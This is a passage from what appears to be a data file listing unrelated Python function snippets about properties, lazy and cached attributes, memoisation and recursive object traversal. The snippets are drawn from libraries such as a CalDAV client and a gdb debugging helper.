property_name):\n assert isinstance(property_name, str)\n\n if _LAZY_PROP_VALUES in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_VALUES]:\n del object.__dict__[_LAZY_PROP_VALUES][property_name]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n if property_name in object.__dict__[_LAZY_PROP_SUBSCRIBERS]:\n for fn in object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name]:\n fn(object)", "def properties(expression, stream):\n def index(expression, stream):\n item = expression.children[0].children[0]\n for node in stream:\n if isinstance(node, Object):\n yield node.get(item, null)\n elif not optional(expression):\n itype = expression.children[0].data\n if itype == 'cname':\n itype = 'string'\n raise TypeError(\n 'cannot index {} with {}'.format(\n node.__class__.__name__, itype\n )\n )\n\n for expression in expression.children:\n stream = index(expression, stream)\n\n for node in stream:\n yield node", "def cached_property(func):\n return Property(fget=func, cached=True)", "def _get_property(self, xpaths):\n result = None\n for xpath in xpaths:\n result = self[xpath]\n if len(result) > 0:\n break\n\n return result", "def clear_all_lazyprops(object):\n if _LAZY_PROP_VALUES in object.__dict__:\n del object.__dict__[_LAZY_PROP_VALUES]\n\n if _LAZY_PROP_SUBSCRIBERS in object.__dict__:\n for subscribers in object.__dict__[_LAZY_PROP_SUBSCRIBERS].values():\n for fn in subscribers:\n fn(object)", "def _cache_property_mutator(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[1]\n return None", "def subscribe_to_lazy_prop(object, property_name, on_change_func):\n assert isinstance(property_name, str)\n\n if not hasattr(object, _LAZY_PROP_SUBSCRIBERS):\n setattr(object, _LAZY_PROP_SUBSCRIBERS, defaultdict(lambda: set()))\n\n object.__dict__[_LAZY_PROP_SUBSCRIBERS][property_name].add(on_change_func)", "def child_properties(self):\n response = check_defined(self, inspect.stack()[0][3])\n if not response:\n return response\n children = self.se.property_only_graph.successors(self.uri)\n result = restructure_output(self,\n children,\n inspect.stack()[0][3],\n self.output_type)\n return result", "def __getattribute__(self, name):\n if name == '__root__' or name == '__pepth__':\n return list.__getattribute__(self, name)\n if not name.endswith('___') and name.startswith('__') and name.endswith('__'):\n raise AttributeError('plist objects cannot call reserved members of their elements: \\'%s\\'' % name)\n try:\n return plist.__getattr__(self, name)\n except AttributeError:\n pass\n if ((name.startswith('__') and name.endswith('___'))\n or (not name.startswith('__') and name.endswith('_'))):\n # Allows calling one level deeper by adding '_' to the end of a property name. 
This is recursive, so '__' on the end goes two levels deep, etc.\n # Works for both regular properties (foos.bar_) and private properties (foos.__len___).\n try:\n starting_unders = 2 if name.startswith('__') else 0 # We don't care about single starting underscores for this count\n ending_unders = 0\n for i in range(len(name) - 1, 0, -1):\n if name[i] == '_':\n ending_unders += 1\n else:\n break\n ending_unders -= starting_unders\n return plist.__getattr__(self, name[:-ending_unders], _pepth=ending_unders)\n except AttributeError:\n pass\n try:\n if plist.all(self, hasattr, name):\n return plist([getattr(x, name) for x in self], root=self.__root__)\n return plist([x[name] for x in self], root=self.__root__)\n except Exception as e:\n raise AttributeError('plist children raised exceptions attempting to get attribute \\'%s\\' (%s)' % (name, str(e)))", "def propertyListGenerator(name, cls):\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]", "def _cache_property_accessor(self, name):\n try:\n methods = self.instance_properties[name]\n except KeyError:\n methods = self._cache_property_methods(name)\n self.instance_properties[name] = methods\n if methods:\n return methods[0]\n return None", "def _query_properties(self, props=None, depth=0):\n root = None\n # build the propfind request\n if props is not None and len(props) > 0:\n prop = dav.Prop() + props\n root = dav.Propfind() + prop\n\n return self._query(root, depth)", "def getPropertiesAll():", "def load(self):\n for prop in self.properties:\n try:\n value = getattr(self, prop)\n self._prop_dict[prop] = value\n except AttributeError as ate:\n pass", "def _determine_properties(self, paramdict):\n for var in paramdict:\n if is_dimensionless(paramdict[var]):\n self._all_params_unit[var] = \"none\"\n yield lems.Property(var, \"none\")\n else:\n dim = _determine_dimension(paramdict[var])\n self._all_params_unit[var] = dim\n yield lems.Property(var, dim)", "def 
load_recursive_state_dict(x, obj):\n if hasattr(obj, 'load_state_dict'):\n obj.load_state_dict(x)\n if isinstance(x, (tuple, list)):\n for xx, oo in zip(x, obj):\n load_recursive_state_dict(xx, oo)\n if isinstance(x, dict):\n for k in objs.keys():\n load_recursive_state_dict(xx[k], oo[k])", "def test_get_all_ancestor_properties(self):\n pass", "def __(self):\n self.__pepth__ = self.pdepth(True)\n return self", "def property_setup(self, properties):\n return properties", "def _eval_shallow(servicedef, obj, need_copy=False):\n\n # _eval_shallow() resolves $ref and $merge to their values in\n # source and with_. This is a *shallow* evaluation in that embedded\n # $ref or $merge at deeper levels are *not* resolved.\n #\n # For example, the following will be resolved:\n # { $ref: ... }\n # { $merge: ... }\n #\n # But the following will *not* be resolved\n # { type: object,\n # properties: { x: { $ref: ... } } }\n #\n # Need to loop in the event that a $ref resolves to another $ref\n # or a $ref to a $merge:\n #\n # { $ref: <target1> } --> { $ref: <target2> } --> { <value2> }\n #\n\n # Minimize copies so that we don't bloat memory\n done = False\n is_copy = False\n while not done:\n if '$merge' in obj:\n with Parser(obj['$merge'], 'eval_shallow') as merge_parser:\n merge_source = merge_parser.parse('source', save=False,\n required=True)\n merge_with = merge_parser.parse('with', save=False,\n required=True)\n\n # This always returns a copy\n obj = json_merge_patch(servicedef, merge_source, merge_with)\n is_copy = True\n\n elif '$ref' in obj:\n if len(list(obj.keys())) != 1:\n raise ParseError(\n \"$ref object may not have any other properties\", obj)\n\n sch = servicedef.find(obj['$ref'])\n obj = sch.input\n is_copy = False\n\n else:\n done = True\n\n if not is_copy and need_copy:\n obj = copy.copy(obj)\n\n return obj", "def build_property(value_token: ValueToken) -> property:\n def caller(_: Any) -> Any:\n return value_token.get_value()\n return property(caller)", "def properties(self):\n raise NotImplementedError", "def _lock_property(self, **properties):\n self._property_lock = properties\n try:\n yield\n finally:\n self._property_lock = {}", "def go_next(context: Context) -> None:\n\n state = context.decode_state()\n if not state:\n print('Selected frame is not in a property.')\n return\n\n # If execution reached the part of the code where the property is about to\n # return a cached result, just let it return.\n if state.in_memoization_lookup:\n gdb.execute('finish')\n return\n\n scope_state, current_expr = state.lookup_current_expr()\n\n if current_expr is None:\n # There are only two possible causes for no currently evaluating\n # expressions: either the property just started (root expression\n # evaluation is ahead), either it is about to return (root expr. 
eval.\n # is behind).\n bp_group = break_scope_start(context, state.property_scope.scope,\n from_line_no=state.line_no)\n\n if bp_group:\n # The first expression is ahead: resume execution until we reach\n # it.\n gdb.execute('continue')\n else:\n gdb.execute('finish')\n\n else:\n # Depending on the control flow behavior of the currently running\n # expression, the next step can be either its parent expression or any\n # of its sub-expressions.\n next_slocs_candidates = []\n\n # First look for the point where the current expression terminates its\n # evaluation.\n next_slocs_candidates.append(current_expr.done_event.line_no)\n\n # Now look for the starting point for all sub-expressions\n for subexpr in current_expr.start_event.sub_expr_start:\n next_slocs_candidates.append(subexpr.line_no)\n\n BreakpointGroup(context, next_slocs_candidates)\n gdb.execute('continue')\n\n new_current_expr = None\n new_expr = None\n\n new_state = context.decode_state()\n if new_state:\n _, new_current_expr = new_state.lookup_current_expr()\n if current_expr:\n new_expr = new_state.lookup_expr(current_expr.expr_id)\n\n # If we just finished the evaluation of an expression, display its value\n if new_expr and new_expr.is_done:\n assert new_state is not None\n print('{} evaluated to: {}'.format(\n expr_repr(new_expr),\n new_expr.read(new_state.frame)\n ))\n\n # Display the expression of most interest, if any\n if new_current_expr:\n print('')\n print('Now evaluating {}'.format(expr_repr(new_current_expr)))", "def Property(name):\n\n attr_name = \"__\" + name\n\n def get(self):\n try:\n return self.__dict__[attr_name]\n except KeyError:\n raise AttributeError, name\n\n def set(self, value):\n if attr_name not in self.__dict__ \\\n or self.__dict__[attr_name] != value:\n self.__dict__[attr_name] = value\n self.is_modified = True\n\n return property(get, set)", "def cached_property(expensive_function):\n @property\n def caching_function(self):\n cacheName = f\"__cache__{expensive_function.__name__}\"\n \n\t\t\n try: # check if the cache has been initialized\n cacheExists = True\n cache = getattr(self, cacheName)\n except AttributeError:\n cacheExists = False\n cache = None\n \n\t\t# Check if the cache is valid (not None), caching is requested, and that it exists\n if ( cache is not None ) and ( self.withCaching == True ) and (cacheExists == True):\n return cache\n else:\n\t\t\t#worst case, now we have to compute the quantity\n computed = expensive_function(self)\n setattr(self, cacheName, computed)\n return computed\n \n return caching_function", "def getProperty(propname):", "def cached_property(fun):\n @functools.wraps(fun)\n def get(self):\n try:\n return self._cache[fun]\n except AttributeError:\n self._cache = {}\n except KeyError:\n pass\n ret = self._cache[fun] = fun(self)\n return ret\n return property(get)", "def test_properties_get(self):\n pass", "def auto_property_list(self, prop_reader_cls, offset_addr, n_offsets, n_items_per_sub_list=0, sub_list_prefix=''):\n prop_reader = prop_reader_cls()\n use_sub_lists = n_items_per_sub_list > 0\n prop_list = {}\n\n # If we don't have sub lists in the property list, just use the main prop_list as the current sub list\n if use_sub_lists:\n sub_list = None\n n_sub_lists = (n_offsets - 1) // n_items_per_sub_list\n else:\n sub_list = prop_list\n n_sub_lists = 1\n\n # Initialize read\n data_addr = offset_addr + n_offsets * 4\n offset = self.uint32()\n\n for prop_id in range(n_offsets - 1):\n # Maybe update sub list\n if use_sub_lists:\n sub_list_id = prop_id // 
n_sub_lists\n prop_id = prop_id % n_sub_lists\n\n if prop_id == 0:\n prop_list[f'{sub_list_prefix}{sub_list_id}'] = sub_list = {}\n\n # Read the property\n next_offset = self.uint32()\n with self.offset_context(data_addr + offset):\n data = prop_reader.read(prop_id, self, next_offset - offset)\n sub_list.update(data)\n\n offset = next_offset\n\n # Set the pointer after the data\n self.seek(data_addr + offset)\n\n return prop_list", "def iterProperties(cls):\n meta = cls.staticMetaObject\n for i in range(meta.propertyCount()):\n yield meta.property(i).name()", "def getParentProperty(self, propertyName):\n return [getattr(fp, propertyName) for dp in self.deblendedParents]", "def useProperties(cls):\n def getter(name):\n def get(self):\n return self.property(name)\n return get\n def setter(name):\n def set(self, value):\n return self.setProperty(name, value)\n return set\n for name in iterProperties(cls):\n setattr(cls, name, property(getter(name), setter(name)))\n return cls", "def property_autoparse(self, candidate_pattern, patterns):\n properties = None\n candidates = self.find_objects(regex=candidate_pattern)\n if len(candidates):\n properties = []\n else:\n return properties\n for candidate in candidates:\n properties.append(self.match_to_dict(line=candidate, patterns=patterns))\n return properties", "def __iter__(self):\n\n result = []\n\n # d - dict, p - path (keys sequence)\n def recurs_iter(d, p=None):\n p = p or []\n\n # k - key, v - value\n for k, v in iteritems(d):\n next_p = p + [k]\n if isinstance(v, dict):\n recurs_iter(v, next_p)\n else:\n result.append(tuple(next_p))\n\n recurs_iter(self.__dict__)\n\n return iter(result)", "def _cache_property_methods(self, name):\n if name.endswith(\"_\"):\n # If the requested name ends with _, that's a marker that we're\n # dealing with a method call, not a property, so we can shortcut\n # the process.\n methods = None\n else:\n # Check 1: Does the class respond to the property?\n responds = libobjc.class_getProperty(self, name.encode(\"utf-8\"))\n\n # Check 2: Does the class have an instance method to retrieve the given name\n accessor = self._cache_method(name)\n\n # Check 3: Is there a setName: method to set the property with the given name\n mutator = self._cache_method(\"set\" + name[0].title() + name[1:] + \":\")\n\n # Check 4: Is this a forced property on this class or a superclass?\n forced = False\n superclass = self\n while superclass is not None:\n if name in superclass.forced_properties:\n forced = True\n break\n superclass = superclass.superclass\n\n # If the class responds as a property, or it has both an accessor *and*\n # and mutator, then treat it as a property in Python.\n if responds or (accessor and mutator) or forced:\n methods = (accessor, mutator)\n else:\n methods = None\n return methods", "def __getitem__(self, key):\n key_split = key.split('.')\n last_index = len(key_split) - 1\n current = self\n for i, k in enumerate(key_split):\n try:\n current = getattr(current, k)\n except KeyError:\n if i == last_index:\n raise\n temp_dict = DotDictWithAcquisition()\n temp_dict.__dict__['_parent'] = weakref.proxy(current)\n current = temp_dict\n return current", "def get_properties():", "def test_dotted_named_entities_circular_references():\n from tests.dottedname.foo.bar.bop import Property\n\n p = Property(\n name='outer',\n nested={\n 'properties': [\n Property(name='inner')\n ]\n }\n )\n assert p\n assert isinstance(p.nested.properties, list)\n assert p.nested.properties[0].name == 'inner'", "def properties_owns(cls, 
*args):\n return cls.graph_traversal(\n None, None, Bytecode()).properties_owns(*args)", "def is_lazy(self) -> bool:\n return self._is_lazy", "def __iter__(self):\n element = self\n\n while element.HasField(\"pathtype\"):\n yield element\n\n if element.HasField(\"nested_path\"):\n element = element.nested_path\n else:\n break", "def get(obj, path):\n right = path\n cur = obj\n while right:\n left, right = partition(right)\n if isinstance(cur, dict):\n cur = cur.get(left)\n elif isinstance(cur, (list, tuple)):\n left = int(left)\n cur = cur[left] if left < len(cur) else None\n return cur", "def __iter__(self):\n n = self.getRoot()\n while n.left is not None:\n n = n.left\n while True:\n yield n.value\n n = n._successor()\n if n is None:\n break", "def __call__(self, arg):\n return self.get_property(arg)", "def max_recursion_depth(self) -> ConfigNodePropertyInteger:\n return self._max_recursion_depth", "def memoized_property(method):\n\n method_name = method.__name__\n attr_name = \"_\" + method_name\n undefined = object()\n\n def wrapped(self):\n attr = getattr(self, attr_name, undefined)\n if attr is undefined:\n attr = method(self)\n setattr(self, attr_name, attr)\n return attr\n\n wrapped = property(wrapped)\n return wrapped", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def getProperty(*args):", "def __iter__(self):\n\n if not self.left and not self.right:\n raise StopIteration\n return self.children().__iter__()\n\n # def SP_traverse(self):\n \"\"\" Return a string of series-parallel partial order.\n\n A recursion way to implement in-order traversal.\n\n return\n -------\n A simple formula of series-parallel partial order\n\n \"\"\"\n # if self.left != None and self.right == None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data)\n #\n # if self.right != None and self.left == None:\n # return str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left != None and self.right != None:\n # return str(self.left.SP_traverse()) + \" \" + str(self.data) + \" \" + str(self.right.SP_traverse())\n #\n # if self.left == None and self.right == None:\n # return str(self.data)", "def _evaluate(prop_name, prop_value, binary_info):\n\n def compatible_prop(setting_value, _prop_value):\n return (_prop_value == setting_value) or (_prop_value == \"None\" and setting_value is None)\n\n # TODO: Necessary to generalize this query evaluation to include all possible fields\n info_settings = binary_info.get(\"settings\", {})\n info_options = binary_info.get(\"options\", {})\n\n if not prop_name.startswith(\"options.\"):\n return compatible_prop(info_settings.get(prop_name), prop_value)\n else:\n prop_name = prop_name[len(\"options.\"):]\n return compatible_prop(info_options.get(prop_name), prop_value)", "def get_next(self):\n\n pos_options = []\n kw_options = {}\n for opt in self.pos_options:\n if isinstance(opt, LazyObject):\n pos_options.append(opt.get_current())\n elif isinstance(opt, LazyExpression):\n pos_options.append(opt.eval())\n else:\n pos_options.append(opt)\n\n for opt_k, opt_v in self.kw_options.items():\n if isinstance(opt_v, LazyObject):\n kw_options[opt_k] = opt.get_current()\n elif isinstance(opt_v, LazyExpression):\n kw_options[opt_k] = opt_v.eval()\n else:\n kw_options[opt_k] = opt_v\n\n self.current_obj = self.cls(*pos_options, **kw_options)\n return self.current_obj", "def callPropertyGet(self, name = \"__value\", index = None):\n\t\tif name == 'IID':\n\t\t\treturn CSLValue(typeid = \"string\", 
value = self.callerInfo.IID)\n\t\tEntry = self.vtbl['p_' + name + \"_get\"]\n\t\t#localTbl = { 'vars':{}, 'status':0, 'props':{}, 'alias':{}, 'persistent':{}, 'instance':{}}\n\t\tpropEntry = Entry.parent\n\t\tprmName = propEntry.data['prm']\n\t\tlocalTbl = self.CSLCreateLocalTbl({}, {}, {}, copy.copy(propEntry.data['persistent']), copy.copy(propEntry.data['instance']))\n\t\tif prmName != \"\":\n\t\t\tif index == None:\n\t\t\t\tdefault = propEntry.data['default']\n\t\t\t\tif default != \"\":\n\t\t\t\t\tdefault = self.CSLCheckValue(default, localTbl)\n\t\t\t\telse:\n\t\t\t\t\tdefault = CSLValue(typeid = \"NULL\", value = None)\n\t\t\telse:\n\t\t\t\tdefault = index\n\n\t\t\tlocalTbl['vars'][prmName] = default\n\n\t\tself.procStack.append('p_' + name + '_get')\n\t\tself.lastLTbl = self.CSLInterpreter(Entry.child, localTbl)\n\t\tself.procStack.pop()\n\t\tl = self.lastLTbl['vars']\n\n\t\tself.debug(DEBUG_CALL, \"\\n\\nGetProp result: (\", name, \")\", l, \"haskey:\", l.has_key(name))\n\n\t\tif l != None and l.has_key(name):\n\t\t\tself.debug(DEBUG_CALL, \"Get Property return:\", l[name])\n\t\t\treturn copy.deepcopy(l[name])\n\t\telse:\n\t\t\treturn CSLValue(typeid = \"NULL\", value = None)", "def test_cached_property():\n new_value = \"99999\"\n\n class DummyClass:\n def __init__(self):\n self.value = \"11111\"\n\n def change_value_in_instance(self, value):\n self.value = value\n\n @cached_property\n def test_property(self):\n return self.value\n\n @property\n def test_uncached_property(self):\n return self.value\n\n testClass = DummyClass()\n first_cached_test_property = testClass.test_property\n first_uncached_test_property = testClass.test_uncached_property\n testClass.change_value_in_instance(new_value)\n second_cached_test_property = testClass.test_property\n second_uncached_test_property = testClass.test_uncached_property\n\n assert first_cached_test_property == second_cached_test_property\n assert first_cached_test_property == \"11111\"\n\n assert first_uncached_test_property != second_uncached_test_property\n assert first_uncached_test_property == \"11111\"\n assert second_uncached_test_property == \"99999\"", "def process_property(self, resources, resource, model, prop, context):\n pass", "def lazy(func):\n\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n name = \"_\" + func.__name__\n try:\n return getattr(self, name)\n except AttributeError:\n value = func(self, *args, **kwargs)\n setattr(self, name, value)\n return value\n\n return wrapper", "def Property(\tsubspaceFunction = lambda instance: instance.sharedStateSubspace,\n default = lambda: None,\n exposeToProtocol = False\n ):\n def propertyListGenerator(name, cls):\n \"\"\"Generates a list of (name, ComputedGraph.Property) objects corresponding to\n this property object.\"\"\"\n\n memo = dict()\n\n def propertyValueFromNodeGetter(instance):\n \"\"\"Get the actual property value from an instance.\n\n instance - a ComputedGraph location that the property is tied to.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n else:\n subspace.keyspace.ensureSubscribed()\n\n val = subspace.value\n\n if val is None:\n return default()\n\n return val[0]\n\n def propertyValueFromNodeSetter(instance, val):\n \"\"\"Set the property value 'name' in instance 'instance' to 'val'\n\n We must be in 'synchronous' mode for this to work. 
We'll load the\n keyspace if its not loaded.\n \"\"\"\n\n subspace = nodeGetter(instance)\n\n if SynchronousPropertyAccess.SynchronousPropertyAccess.getCurrent() is not None:\n if not subspace.loaded:\n subspace.keyspace.waitLoaded()\n\n if subspace.value != (val,):\n subspace.value = (val,)\n\n def nodeGetter(instance):\n \"\"\"Produces a CGSS.Node.Node object corresponding to this property's value.\n\n We use the hash of the result of the documentGetter function to decide which keyspace\n we want to use, and then we hash the pair (instance, name) to decide which key\n to use.\n \"\"\"\n if (instance, name) not in memo:\n subspace = subspaceFunction(instance)\n\n if subspace is None:\n assert False, \"Instance %s produced an empty subspace\" % instance\n\n memo[(instance,name)] = subspace.subspace(name)\n return memo[(instance,name)]\n\n return [\n (name, ComputedGraph.Property(propertyValueFromNodeGetter,propertyValueFromNodeSetter))\n ]\n\n return ComputedGraph.PropertyMaker(propertyListGenerator, exposeToProtocol)", "def __get__(self,obj,objtype):\n gen = super(Dynamic,self).__get__(obj,objtype)\n\n if not hasattr(gen,'_Dynamic_last'):\n return gen\n else:\n return self._produce_value(gen)", "def make_recursive_propdict(wcroot,\r\n output,\r\n rex = re.compile(\"Properties on '(.*)':\")):\r\n lines = filter(None, output.split('\\n'))\r\n pdict = {}\r\n while lines:\r\n line = lines.pop(0)\r\n m = rex.match(line)\r\n if not m:\r\n raise ValueError, \"could not parse propget-line: %r\" % line\r\n path = m.groups()[0]\r\n wcpath = wcroot.join(path, abs=1)\r\n propnames = []\r\n while lines and lines[0].startswith(' '):\r\n propname = lines.pop(0).strip()\r\n propnames.append(propname)\r\n assert propnames, \"must have found properties!\"\r\n pdict[wcpath] = svncommon.PropListDict(wcpath, propnames)\r\n return pdict", "def _compute_invalidation_scope_recursive(request, result, meta, source_type, target_type, simulated_prop):\n if 'calculatedProperty' in meta: # we cannot patch calc props, so behavior here is irrelevant\n return\n elif meta['type'] == 'object':\n if 'properties' not in meta:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n elif meta['type'] == 'array':\n sub_type = meta['items']['type']\n if sub_type == 'object':\n if 'properties' not in meta['items']:\n return # sometimes can occur (see workflow.json in fourfront) - nothing we can do\n for sub_prop, sub_meta in meta['items']['properties'].items():\n _compute_invalidation_scope_recursive(request, result, sub_meta, source_type, target_type,\n '.'.join([simulated_prop, sub_prop]))\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)\n else:\n _compute_invalidation_scope_base(request, result, source_type, target_type, simulated_prop)", "def properties(self):", "def properties(self):", "def properties(self):", "def test_lazy_base_class(self):\n\n class Base(object):\n def base_method(self):\n pass\n\n class Klazz(Base):\n pass\n\n t = lazy(lambda: Klazz(), Klazz)()\n self.assertTrue('base_method' in dir(t))", "def deepget(self, key):\n if DEBUG: print(repr(self))\n if '.' 
in key:\n top, rest = key.split('.', 1)\n #if DEBUG: print(top, rest)\n return self[top].deepget(rest)\n else:\n return self[key]", "def get_properties(self):\n return self.properties", "def get_cached_property_names(self): # real signature unknown; restored from __doc__\n return []", "def property( self, prop ):\n raise NotImplementedError(\"property\")", "def prop(self, statement):\n return MinCut.prop(self._root, statement)", "def abstractproperty(func):\n if sys.version_info > (3, 3):\n return property(abc.abstractmethod(func))\n return abc.abstractproperty(func)", "def __properties__(self) -> dict:\r\n parameters = [\r\n d for d in dir(self) if (d[0] != \"_\") and (d.count(\"set\") == 0)\r\n and (d.count(\"_c\") == 0) and (d.count(\"_f\") == 0)\r\n ]\r\n\r\n return self.__as_json__(parameters)", "def __iter__(self):\n if self.left is not None:\n yield from self.left\n yield self\n if self.right is not None:\n yield from self.right", "def get_property(self, property, data):\n\n values = data.xpath(\"%s//*[@%s='%s']\" % (self.scope, self.attribute, property))\n if len(values) == 0:\n values = data.xpath(\"//*[@%s='%s']\" % (self.attribute, property))\n return values", "def test_properties_evolution_get(self):\n pass", "def test_augassign_recursion():\n # infinitely recurses in python\n code = \"\"\"\n def rec():\n a = 0\n a += rec()\n return a\n rec()\n \"\"\"\n cls_node = extract_node(code)\n assert next(cls_node.infer()) is util.Uninferable", "def lazy_value(self):\n\n if self.state == Node.State.VALID:\n return self.value\n else:\n return None", "def propertyx(function):\n keys = ('fget', 'fset', 'fdel')\n func_locals = {'doc': function.__doc__}\n\n def probe_func(frame, event, arg):\n if event == 'return':\n locals = frame.f_locals\n func_locals.update(dict((k, locals.get(k)) for k in keys))\n sys.settrace(None)\n return probe_func\n\n sys.settrace(probe_func)\n function()\n return property(**func_locals)", "async def _materialize_walk_obj(d) -> Tree:\n if isinstance(d, ViewModel):\n # Resolve the first level of awaitables\n edge_set = set(d.__visited_edges__)\n edges = await resolve_parallel_dict(d, edge_set)\n # Resolve all edges recursively\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in edges))\n for (k, _), val in zip(edges, vals):\n if k in edge_set:\n setattr(d, k, val)\n return d\n elif isinstance(d, dict):\n # Resolve the first level of awaitables\n items = await resolve_parallel_dict(d)\n vals = await asyncio.gather(*(_materialize_walk_obj(v) for k, v in items))\n for (k, _), val in zip(items, vals):\n d[k] = val\n return d\n elif isinstance(d, primitive) or d is None:\n return d\n elif isinstance(d, PaginatedEdge):\n d.edges = await resolve_parallel_iterable(d.edges)\n return d\n elif isinstance(d, Iterable):\n resolved = await resolve_parallel_iterable(d)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif type(d) == types.AsyncGeneratorType:\n d_list = [i async for i in d] # TODO: Optimize\n resolved = await resolve_parallel_iterable(d_list)\n return await asyncio.gather(\n *(val for val in (_materialize_walk_obj(v) for v in resolved) if val)\n )\n elif isawaitable(d) or callable(d):\n # TODO: Profile and optimize recursive call\n resolved = await async_resolve_field(d)\n return await _materialize_walk_obj(resolved)\n raise Exception(\"Invalid type: \" + str(type(d)))", "def run(self):\n # Look through the properties.\n for name, value in \\\n 
self.context.get_properties(self.path).items():\n\n # If the name doesn't match, skip this one.\n if self.nameregex \\\n and not self.nameregex.match(name): continue\n\n # If the value doesn't match, skip this one.\n if self.valueregex \\\n and not self.valueregex.search(value): continue\n\n # Execute the child actions.\n self.context.tokens['PropName'] = name\n self.context.tokens['PropValue'] = value\n exitcode = super(FilterPropList, self).run()\n\n # If only looking for the first, or an error is reported,\n # bail out early.\n if self.matchfirst or exitcode != 0: return exitcode\n\n # Handle a non-error exit.\n return 0", "def get_properties(\n self, props=None, depth=0, parse_response_xml=True, parse_props=True\n ):\n rc = None\n response = self._query_properties(props, depth)\n if not parse_response_xml:\n return response\n\n if not parse_props:\n properties = response.find_objects_and_props()\n else:\n properties = response.expand_simple_props(props)\n\n error.assert_(properties)\n\n path = unquote(self.url.path)\n if path.endswith(\"/\"):\n exchange_path = path[:-1]\n else:\n exchange_path = path + \"/\"\n\n if path in properties:\n rc = properties[path]\n elif exchange_path in properties:\n if not isinstance(self, Principal):\n ## Some caldav servers reports the URL for the current\n ## principal to end with / when doing a propfind for\n ## current-user-principal - I believe that's a bug,\n ## the principal is not a collection and should not\n ## end with /. (example in rfc5397 does not end with /).\n ## ... but it gets worse ... when doing a propfind on the\n ## principal, the href returned may be without the slash.\n ## Such inconsistency is clearly a bug.\n log.error(\n \"potential path handling problem with ending slashes. Path given: %s, path found: %s. %s\"\n % (path, exchange_path, error.ERR_FRAGMENT)\n )\n error._assert(False)\n rc = properties[exchange_path]\n elif self.url in properties:\n rc = properties[self.url]\n elif \"/principal/\" in properties and path.endswith(\"/principal/\"):\n ## Workaround for a known iCloud bug.\n ## The properties key is expected to be the same as the path.\n ## path is on the format /123456/principal/ but properties key is /principal/\n ## tests apparently passed post bc589093a34f0ed0ef489ad5e9cba048750c9837 and 3ee4e42e2fa8f78b71e5ffd1ef322e4007df7a60, even without this workaround\n ## TODO: should probably be investigated more.\n ## (observed also by others, ref https://github.com/python-caldav/caldav/issues/168)\n rc = properties[\"/principal/\"]\n elif \"//\" in path and path.replace(\"//\", \"/\") in properties:\n ## ref https://github.com/python-caldav/caldav/issues/302\n ## though, it would be nice to find the root cause,\n ## self.url should not contain double slashes in the first place\n rc = properties[path.replace(\"//\", \"/\")]\n elif len(properties) == 1:\n ## Ref https://github.com/python-caldav/caldav/issues/191 ...\n ## let's be pragmatic and just accept whatever the server is\n ## throwing at us. But we'll log an error anyway.\n log.error(\n \"Possibly the server has a path handling problem, possibly the URL configured is wrong.\\n\"\n \"Path expected: %s, path found: %s %s.\\n\"\n \"Continuing, probably everything will be fine\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n rc = list(properties.values())[0]\n else:\n log.error(\n \"Possibly the server has a path handling problem. 
Path expected: %s, paths found: %s %s\"\n % (path, str(list(properties.keys())), error.ERR_FRAGMENT)\n )\n error.assert_(False)\n\n if parse_props:\n self.props.update(rc)\n return rc", "def isprop(v):\n return isinstance(v, property)", "def traverse(self, recursive=False):\n out = []\n for i in range(len(self.keys)):\n if recursive == True and self.refs[i] != None:\n out.extend(self.refs[i].traverse(recursive=True))\n out.append[self.values[i]]\n if recursive == True:\n out.extend(self.refs[i+1].traverse(recursive=True))\n return out", "def walk(obj,dict_fn):\n if isinstance(obj,dict):\n result = dict()\n for key, value in obj.items():\n result[key] = walk(value, dict_fn)\n return dict_fn(result)\n if isinstance(obj,list):\n return [walk(i,dict_fn) for i in obj]\n return obj", "def memoized(fget):\n attr_name = \"_{0}\".format(fget.__name__)\n\n @wraps(fget)\n def fget_memoized(self):\n if not hasattr(self, attr_name):\n setattr(self, attr_name, fget(self))\n return getattr(self, attr_name)\n\n return property(fget_memoized)", "def enable_lazy():\r\n global USE_LAZY\r\n USE_LAZY = True", "def computed_some_property(config):\n return config.something + 10", "def run_properties(self, expanded, unexpanded) 